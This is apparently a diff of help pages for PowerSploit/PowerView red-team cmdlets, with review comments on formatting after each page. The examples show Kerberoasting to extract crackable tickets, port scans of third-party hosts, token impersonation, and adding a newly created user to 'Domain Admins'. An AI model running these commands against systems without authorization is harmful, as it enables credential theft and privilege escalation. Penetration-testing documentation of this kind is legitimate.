+ [-OutputFormat <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Uses Get-DomainUser to query for user accounts with non-null service principle
+names (SPNs) and uses Get-SPNTicket to request/extract the crackable ticket information.
+The ticket format can be specified with -OutputFormat \<John/Hashcat\>.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Invoke-Kerberoast | fl
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Invoke-Kerberoast -Domain dev.testlab.local | fl
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -orce
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLB\dfm.a', $SecPassword)
+Invoke-Kerberoast -Credential $Cred -Verbose | fl
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -OutputFormat
+Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.
+Defaults to 'John'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Format
+
+Required: False
+Position: Named
+Default value: John
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.SPNTicket
+
+Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section.
+
+## NOTES
+
+## RELATED LINKS
+
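Review bot: Example 3 does not run as written: `-orce` should be `-Force` and `TESTLB\dfm.a` should be `TESTLAB\dfm.a` (matching the other files); it also has the split fence seen elsewhere. Documentation inconsistencies: DESCRIPTION says "uses Get-SPNTicket" while Required Dependencies lists Get-DomainSPNTicket; "service principle names" should be "service principal names"; `-Identity` says "Wildcards accepted" but its block says `Accept wildcard characters: False`; `-ServerTimeLimit` says "Default of 120 seconds" but its block says `Default value: 0`. Since the SYNOPSIS says the function requests service tickets, NOTES is the place to state that every such request goes to a domain controller, which is the side effect a reader of this page should expect.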
diff --git a/docs/Recon/Invoke-Portscan.md b/docs/Recon/Invoke-Portscan.md new file mode 100755 index 0000000..49d9e32 --- /dev/null +++ b/docs/Recon/Invoke-Portscan.md @@ -0,0 +1,430 @@ +# Invoke-Portscan
+
+## SYNOPSIS
+Simple portscan module
+
+PowerSploit Function: Invoke-Portscan
+Author: Rich Lundeen (http://webstersProdigy.net)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+### cmdHosts
+```
+Invoke-Portscan -Hosts <String[]> [-ExcludeHosts <String>] [-Ports <String>] [-PortFile <String>]
+ [-TopPorts <String>] [-ExcludedPorts <String>] [-SkipDiscovery] [-PingOnly] [-DiscoveryPorts <String>]
+ [-Threads <Int32>] [-nHosts <Int32>] [-Timeout <Int32>] [-SleepTimer <Int32>] [-SyncFreq <Int32>] [-T <Int32>]
+ [-GrepOut <String>] [-XmlOut <String>] [-ReadableOut <String>] [-AllformatsOut <String>] [-noProgressMeter]
+ [-quiet] [-ForceOverwrite]
+```
+
+### fHosts
+```
+Invoke-Portscan -HostFile <String> [-ExcludeHosts <String>] [-Ports <String>] [-PortFile <String>]
+ [-TopPorts <String>] [-ExcludedPorts <String>] [-SkipDiscovery] [-PingOnly] [-DiscoveryPorts <String>]
+ [-Threads <Int32>] [-nHosts <Int32>] [-Timeout <Int32>] [-SleepTimer <Int32>] [-SyncFreq <Int32>] [-T <Int32>]
+ [-GrepOut <String>] [-XmlOut <String>] [-ReadableOut <String>] [-AllformatsOut <String>] [-noProgressMeter]
+ [-quiet] [-ForceOverwrite]
+```
+
+## DESCRIPTION
+Does a simple port scan using regular sockets, based (pretty) loosely on nmap
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Invoke-Portscan -Hosts "webstersprodigy.net,google.com,microsoft.com" -TopPorts 50
+```
+
+Description
+-----------
+Scans the top 50 ports for hosts found for webstersprodigy.net,google.com, and microsoft.com
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+echo webstersprodigy.net | Invoke-Portscan -oG test.gnmap -f -ports "80,443,8080"
+```
+
+Description
+-----------
+Does a portscan of "webstersprodigy.net", and writes a greppable output file
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Invoke-Portscan -Hosts 192.168.1.1/24 -T 4 -TopPorts 25 -oA localnet
+```
+
+Description
+-----------
+Scans the top 20 ports for hosts found in the 192.168.1.1/24 range, outputs all file formats
+
+## PARAMETERS
+
+### -Hosts
+Include these comma seperated hosts (supports IPv4 CIDR notation) or pipe them in
+
+```yaml
+Type: String[]
+Parameter Sets: cmdHosts
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -HostFile
+Input hosts from file rather than commandline
+
+```yaml
+Type: String
+Parameter Sets: fHosts
+Aliases: iL
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ExcludeHosts
+Exclude these comma seperated hosts
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: exclude
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Ports
+Include these comma seperated ports (can also be a range like 80-90)
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: p
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PortFile
+Input ports from a file
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: iP
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -TopPorts
+Include the x top ports - only goes to 1000, default is top 50
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ExcludedPorts
+Exclude these comma seperated ports
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: xPorts
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SkipDiscovery
+Treat all hosts as online, skip host discovery
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: Pn
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PingOnly
+Ping scan only (disable port scan)
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: sn
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -DiscoveryPorts
+Comma separated ports used for host discovery.
+-1 is a ping
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: PS
+
+Required: False
+Position: Named
+Default value: -1,445,80,443
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+number of max threads for the thread pool (per host)
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 100
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -nHosts
+number of hosts to concurrently scan
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 25
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Timeout
+Timeout time on a connection in miliseconds before port is declared filtered
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 2000
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SleepTimer
+Wait before thread checking, in miliseconds
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 500
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SyncFreq
+How often (in terms of hosts) to sync threads and flush output
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 1024
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -T
+\[0-5\] shortcut performance options.
+Default is 3.
+higher is more aggressive.
+Sets (nhosts, threads,timeout)
+ 5 {$nHosts=30; $Threads = 1000; $Timeout = 750 }
+ 4 {$nHosts=25; $Threads = 1000; $Timeout = 1200 }
+ 3 {$nHosts=20; $Threads = 100; $Timeout = 2500 }
+ 2 {$nHosts=15; $Threads = 32; $Timeout = 3000 }
+ 1 {$nHosts=10; $Threads = 32; $Timeout = 5000 }
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -GrepOut
+Greppable output file
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: oG
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -XmlOut
+output XML file
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: oX
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ReadableOut
+output file in 'readable' format
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: oN
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AllformatsOut
+output in readable (.nmap), xml (.xml), and greppable (.gnmap) formats
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: oA
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -noProgressMeter
+Suppresses the progress meter
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -quiet
+supresses returned output and don't store hosts in memory - useful for very large scans
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: q
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ForceOverwrite
+Force Overwrite if output Files exist.
+Otherwise it throws exception
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: F
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://webstersprodigy.net](http://webstersprodigy.net)
+
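Review bot: the per-level tuning table at the top of this hunk (`+ 5 {$nHosts=30; $Threads = 1000; $Timeout = 750 }` through `+ 1 {$nHosts=10; $Threads = 32; $Timeout = 5000 }`) appears outside any code fence, so the markdown renderer will collapse the five lines into a single paragraph; indent them or fence them in the comment-based help so platyPS keeps the layout. Two wording points in the parameter descriptions: `-quiet` reads `supresses returned output and don't store hosts in memory`, which should be "suppresses returned output and does not store hosts in memory", and `-ForceOverwrite`'s `Otherwise it throws exception` needs an article ("throws an exception"). The `## INPUTS` and `## OUTPUTS` sections are empty even though the `-GrepOut`/`-XmlOut`/`-ReadableOut`/`-AllformatsOut` switches describe file output; a one-line OUTPUTS entry stating what is returned to the pipeline when no output file is given would help.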
diff --git a/docs/Recon/Invoke-ReverseDnsLookup.md b/docs/Recon/Invoke-ReverseDnsLookup.md new file mode 100755 index 0000000..348ad91 --- /dev/null +++ b/docs/Recon/Invoke-ReverseDnsLookup.md @@ -0,0 +1,106 @@ +# Invoke-ReverseDnsLookup
+
+## SYNOPSIS
+Perform a reverse DNS lookup scan on a range of IP addresses.
+
+PowerSploit Function: Invoke-ReverseDnsLookup
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Invoke-ReverseDnsLookup [-IpRange] <String>
+```
+
+## DESCRIPTION
+Invoke-ReverseDnsLookup scans an IP address range for DNS PTR records.
+This script is useful for performing DNS reconnaisance prior to conducting an authorized penetration test.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Invoke-ReverseDnsLookup 74.125.228.0/29
+```
+
+IP HostName
+-- --------
+74.125.228.1 iad23s05-in-f1.1e100.net
+74.125.228.2 iad23s05-in-f2.1e100.net
+74.125.228.3 iad23s05-in-f3.1e100.net
+74.125.228.4 iad23s05-in-f4.1e100.net
+74.125.228.5 iad23s05-in-f5.1e100.net
+74.125.228.6 iad23s05-in-f6.1e100.net
+
+Description
+-----------
+Returns the hostnames of the IP addresses specified by the CIDR range.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Invoke-ReverseDnsLookup '74.125.228.1,74.125.228.4-74.125.228.6'
+```
+
+IP HostName
+-- --------
+74.125.228.1 iad23s05-in-f1.1e100.net
+74.125.228.4 iad23s05-in-f4.1e100.net
+74.125.228.5 iad23s05-in-f5.1e100.net
+74.125.228.6 iad23s05-in-f6.1e100.net
+
+Description
+-----------
+Returns the hostnames of the IP addresses specified by the IP range specified.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Write-Output "74.125.228.1,74.125.228.0/29" | Invoke-ReverseDnsLookup
+```
+
+IP HostName
+-- --------
+74.125.228.1 iad23s05-in-f1.1e100.net
+74.125.228.1 iad23s05-in-f1.1e100.net
+74.125.228.2 iad23s05-in-f2.1e100.net
+74.125.228.3 iad23s05-in-f3.1e100.net
+74.125.228.4 iad23s05-in-f4.1e100.net
+74.125.228.5 iad23s05-in-f5.1e100.net
+74.125.228.6 iad23s05-in-f6.1e100.net
+
+Description
+-----------
+Returns the hostnames of the IP addresses piped from another source.
+
+## PARAMETERS
+
+### -IpRange
+Specifies the IP address range.
+The range provided can be in the form of a single IP address, a low-high range, or a CIDR range.
+Comma-delimited ranges may can be provided.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.exploit-monday.com
+https://github.com/mattifestation/PowerSploit]()
+
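Review bot: the RELATED LINKS entry at the end of this hunk is malformed: `[http://www.exploit-monday.com` / `https://github.com/mattifestation/PowerSploit]()` merges two URLs into one link text with an empty target, so neither renders as a working link; put each URL in its own `.LINK` block in the comment-based help so platyPS emits two separate links. The examples also fence only the command line, leaving the `IP HostName` output tables and the `Description` / `-----------` blocks as unfenced prose where the column alignment will be lost. Minor text fixes: `reconnaisance` should be `reconnaissance` in DESCRIPTION, and `Comma-delimited ranges may can be provided.` should drop either `may` or `can`. Since `-IpRange` accepts pipeline input ByValue (Example 3 depends on it), the empty `## INPUTS` section should list `String`, and `## OUTPUTS` should name the object type whose `IP` and `HostName` columns the examples show.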
diff --git a/docs/Recon/Invoke-RevertToSelf.md b/docs/Recon/Invoke-RevertToSelf.md new file mode 100755 index 0000000..4e978ac --- /dev/null +++ b/docs/Recon/Invoke-RevertToSelf.md @@ -0,0 +1,56 @@ +# Invoke-RevertToSelf
+
+## SYNOPSIS
+Reverts any token impersonation.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+## SYNTAX
+
+```
+Invoke-RevertToSelf [[-TokenHandle] <IntPtr>]
+```
+
+## DESCRIPTION
+This function uses RevertToSelf() to revert any impersonated tokens.
+If -TokenHandle is passed (the token handle returned by Invoke-UserImpersonation),
+CloseHandle() is used to close the opened handle.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$Token = Invoke-UserImpersonation -Credential $Cred
+Invoke-RevertToSelf -TokenHandle $Token
+
+## PARAMETERS
+
+### -TokenHandle
+An optional IntPtr TokenHandle returned by Invoke-UserImpersonation.
+
+```yaml
+Type: IntPtr
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
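Review bot: Example 1 in this hunk is cut in half by the generator: only `$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force` is inside the fence, while `$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)`, `$Token = Invoke-UserImpersonation -Credential $Cred` and `Invoke-RevertToSelf -TokenHandle $Token` follow as loose paragraphs; the help parser treats only the first line of an `.EXAMPLE` block as code, so either keep the sequence on one line or fix the fence by hand in the generated markdown. Worth stating in the `-TokenHandle` text that, because the DESCRIPTION says the handle is passed to CloseHandle(), the IntPtr is invalid after this call and must not be fed back into `Invoke-UserImpersonation -TokenHandle`. `## OUTPUTS` is empty; a line saying the function returns nothing (or what it does return) would complete the page.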
diff --git a/docs/Recon/Invoke-UserImpersonation.md b/docs/Recon/Invoke-UserImpersonation.md new file mode 100755 index 0000000..6b1afc4 --- /dev/null +++ b/docs/Recon/Invoke-UserImpersonation.md @@ -0,0 +1,100 @@ +# Invoke-UserImpersonation
+
+## SYNOPSIS
+Creates a new "runas /netonly" type logon and impersonates the token.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+## SYNTAX
+
+### Credential (Default)
+```
+Invoke-UserImpersonation -Credential <PSCredential> [-Quiet]
+```
+
+### TokenHandle
+```
+Invoke-UserImpersonation -TokenHandle <IntPtr> [-Quiet]
+```
+
+## DESCRIPTION
+This function uses LogonUser() with the LOGON32_LOGON_NEW_CREDENTIALS LogonType
+to simulate "runas /netonly".
+The resulting token is then impersonated with
+ImpersonateLoggedOnUser() and the token handle is returned for later usage
+with Invoke-RevertToSelf.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Invoke-UserImpersonation -Credential $Cred
+
+## PARAMETERS
+
+### -Credential
+A \[Management.Automation.PSCredential\] object with alternate credentials
+to impersonate in the current thread space.
+
+```yaml
+Type: PSCredential
+Parameter Sets: Credential
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -TokenHandle
+An IntPtr TokenHandle returned by a previous Invoke-UserImpersonation.
+If this is supplied, LogonUser() is skipped and only ImpersonateLoggedOnUser()
+is executed.
+
+```yaml
+Type: IntPtr
+Parameter Sets: TokenHandle
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Quiet
+Suppress any warnings about STA vs MTA.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### IntPtr
+
+The TokenHandle result from LogonUser.
+
+## NOTES
+
+## RELATED LINKS
+
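Review bot: the `-Quiet` description (`Suppress any warnings about STA vs MTA.`) refers to a warning that nothing else on the page explains; add a NOTES entry saying what it means for the caller, namely that the impersonation applies to the current thread (the `-Credential` text already says `to impersonate in the current thread space`), so in a multi-threaded apartment host later commands may not run under the impersonated token. Example 1 has the same fencing problem as the other hunks in this patch: only `$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force` is fenced, and `$Cred = New-Object ...` / `Invoke-UserImpersonation -Credential $Cred` land outside it. The `## OUTPUTS` entry (`The TokenHandle result from LogonUser.`) should also say that the handle is to be released with `Invoke-RevertToSelf -TokenHandle`, which the DESCRIPTION already promises for `later usage`.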
diff --git a/docs/Recon/New-DomainGroup.md b/docs/Recon/New-DomainGroup.md new file mode 100755 index 0000000..fc5cac0 --- /dev/null +++ b/docs/Recon/New-DomainGroup.md @@ -0,0 +1,150 @@ +# New-DomainGroup
+
+## SYNOPSIS
+Creates a new domain group (assuming appropriate permissions) and returns the group object.
+
+TODO: implement all properties that New-ADGroup implements (https://technet.microsoft.com/en-us/library/ee617253.aspx).
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-PrincipalContext
+
+## SYNTAX
+
+```
+New-DomainGroup [-SamAccountName] <String> [[-Name] <String>] [[-DisplayName] <String>]
+ [[-Description] <String>] [[-Domain] <String>] [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+First binds to the specified domain context using Get-PrincipalContext.
+The bound domain context is then used to create a new
+DirectoryServices.AccountManagement.GroupPrincipal with the specified
+group properties.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.'
+```
+
+Creates the 'TestGroup' group with the specified description.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.' -Credential $Cred
+
+Creates the 'TestGroup' group with the specified description using the specified alternate credentials.
+
+## PARAMETERS
+
+### -SamAccountName
+Specifies the Security Account Manager (SAM) account name of the group to create.
+Maximum of 256 characters.
+Mandatory.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Name
+Specifies the name of the group to create.
+If not provided, defaults to SamAccountName.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -DisplayName
+Specifies the display name of the group to create.
+If not provided, defaults to SamAccountName.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Description
+Specifies the description of the group to create.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 4
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use to search for user/group principals, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 5
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 6
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### DirectoryServices.AccountManagement.GroupPrincipal
+
+## NOTES
+
+## RELATED LINKS
+
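Review bot: the SYNOPSIS carries a `TODO: implement all properties that New-ADGroup implements (https://technet.microsoft.com/en-us/library/ee617253.aspx)` line, and the New-DomainUser hunk below cites the identical ee617253 URL for New-ADUser, so one of the two references is a copy-paste error; a TODO also belongs in `## NOTES` (or the source only), not in the generated synopsis. The `-Domain` text `Specifies the domain to use to search for user/group principals, defaults to the current domain.` was lifted from a search cmdlet; this function creates a group, so it should read "the domain in which to create the group". Example 2 is split by the generator, with only `$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force` fenced and `$Cred = New-Object ...` / `New-DomainGroup ... -Credential $Cred` outside the fence.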
diff --git a/docs/Recon/New-DomainUser.md b/docs/Recon/New-DomainUser.md new file mode 100755 index 0000000..80f4fcf --- /dev/null +++ b/docs/Recon/New-DomainUser.md @@ -0,0 +1,184 @@ +# New-DomainUser
+
+## SYNOPSIS
+Creates a new domain user (assuming appropriate permissions) and returns the user object.
+
+TODO: implement all properties that New-ADUser implements (https://technet.microsoft.com/en-us/library/ee617253.aspx).
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-PrincipalContext
+
+## SYNTAX
+
+```
+New-DomainUser [-SamAccountName] <String> [-AccountPassword] <SecureString> [[-Name] <String>]
+ [[-DisplayName] <String>] [[-Description] <String>] [[-Domain] <String>] [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+First binds to the specified domain context using Get-PrincipalContext.
+The bound domain context is then used to create a new
+DirectoryServices.AccountManagement.UserPrincipal with the specified user properties.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword
+
+Creates the 'harmj0y2' user with the specified description and password.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$user = New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword -Credential $Cred
+
+Creates the 'harmj0y2' user with the specified description and password, using the specified
+alternate credentials.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred
+
+Creates the 'andy' user with the specified description and password, using the specified
+alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember
+and the alternate credentials.
+
+## PARAMETERS
+
+### -SamAccountName
+Specifies the Security Account Manager (SAM) account name of the user to create.
+Maximum of 256 characters.
+Mandatory.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AccountPassword
+Specifies the password for the created user.
+Mandatory.
+
+```yaml
+Type: SecureString
+Parameter Sets: (All)
+Aliases: Password
+
+Required: True
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Name
+Specifies the name of the user to create.
+If not provided, defaults to SamAccountName.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -DisplayName
+Specifies the display name of the user to create.
+If not provided, defaults to SamAccountName.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
